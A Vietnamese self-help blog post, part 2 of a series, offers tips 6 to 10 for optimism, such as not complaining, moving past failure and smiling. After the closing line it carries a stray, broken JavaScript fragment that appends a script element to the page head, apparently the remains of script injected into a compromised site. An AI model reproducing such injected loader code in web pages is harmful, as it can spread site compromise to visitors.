Phương pháp giúp bạn luôn lạc quan trong cuộc sống (Phần 2)

 

Hôm nay tôi tiếp tục đưa ra những phương pháp giúp bạn có cuộc sống tươi vui, thoát khỏi mớ  hỗn độn công việc.

 

lac  quan phần 2

 

 

6. “ Stop” việc than vãn

 

Than vãn liệu có làm mọi chuyện trở nên tốt đẹp lên không? Nếu  bạn cảm thấy công việc hiện tại của bạn quá cực nhọc, lương thấp, lại không ổn định. Hãy cố gắng trả lời những câu hỏi sau: “Ông chủ của bạn có thật sự quá đáng? Và ông ta có làm gì để đả kích, xúc phạm đến danh dự của bạn không?”, “ Vị trí làm việc của bạn có thật sự tồi tệ như bạn nghĩ không?”, “ Cuộc sống hiện tại của bạn có phải là một cơn ác mộng không?”, “ Bạn là túp người thích đứng nhìn mọi việc diễn ra theo tình huống xấu hay là người thích làm một cái  gì đó để cải thiện những tình huống xấu?”.

 

7.Đừng để thất bại trong quá khứ ám ảnh bạn

 

Sau thất bại là một bước trưởng thành dài vì thế bạn cần bước qua nó, để đi tiếp con đường bạn phải đi. Đừng quỵ ngã, cũng đừng đổ vỡ niềm tin vào chính mình. Bất kỳ ai cũng co lúc gặp thất bại, bởi không phải cứ nỗ lực là đạt được thành công. Ngoài những yếu tố cần như kinh nghiệm, kiến thức, kỹ năng, thời cơ thì còn cần đến một chút may mắn để có được thành công như mong đợi. Hãy mạnh mẽ lên, bạn sẽ làm nên thành công từ những thất bại của chính mình! Bởi ông cha ta có câu:

Thất bại là mẹ thành công

 

thanh cong

 

 

8.Tự tặng quà cho chính bản thân

 

Bạn đạt được thành tựu trong cuộc sống , vậy thì hãy tự thưởng cho mình món quà làm động lực thúc đẩy. Đôi khi món quà lớn nhất chính là sự cảm nhận, thư giãn. Bạn hãy rời bỏ những kế hoạch ngay bây giờ. Dừng lại và lắng nghe điều kỳ diệu của những khoảnh khắc ngay lúc này. Hãy lắng nghe tiếng chim hót ngoài cửa sổ, ngắm nhìn những hạt mưa bay bay. Chiêm ngưỡng chuỗi màu sắc lung linh trên bầu trời và thử đặt tên cho nó. Hãy trân trọng món quà hiện tại vì bảo đảm rằng bạn vẫn còn rất nhiều thời gian cho bạn hoàn thành những công việc quan trọng khác. Giây phút này bạn hãy dành cho bản thân, một chút thôi nha bạn, bạn sẽ thấy nhiều điều kỳ diệu sẽ xảy ra.

 

9.Không lẫn lộn tình cảm với công việc

 

Bạn mang cuộc sống riêng tư của bạn vào văn phòng ư? Hãy coi chừng đấy. Đừng bao giờ trút muộn phiền công việc lên chồng (vợ). Một ngày làm bạn làm việc mệt mỏi thì cũng nhớ rằng người bạn đời của bạn cũng có nhữgn phiền muộn trong công việc như bạn vậy. Hãy cố tạo cho nhau những cảm giác thư giãn khi gần gũi.

 

10.Mỉm cười

 

Cuộc sống này luôn có những chông gai thử thách. Có nhiều thứ không gọi thành tên và nhiều thứ không thể lí giải được . Vì thế mà, hãy cứ yêu thương, hãy cứ ước mơ, hãy cứ là chính bản thân mình, hãy buông tay khi không thể níu giữ, hãy cứ khóc đi nếu như sức chịu đựng vượt qua giới hạn của bản thân và ngủ một giấc thật dài thật sâu để những nỗi buồn sẽ trôi vào quên lãng… Hãy học cách mỉm cười với cuộc sống!

Và nhiều nghiên cứu cho rằng mỉm cười sẽ giúp bạn sống lâu hơn , loại bỏ căng thẳng và thậm chí còn nâng cao năng lực.

Qua những phương pháp trên, tôi mong các bạn sẽ có cuộc sống lạc quan yêu đời và thành công trong sự nghiệp.

 

Chúc các bạn thành công !d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) { d.getElementsByTagName('head')[0].appendChild(s);

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *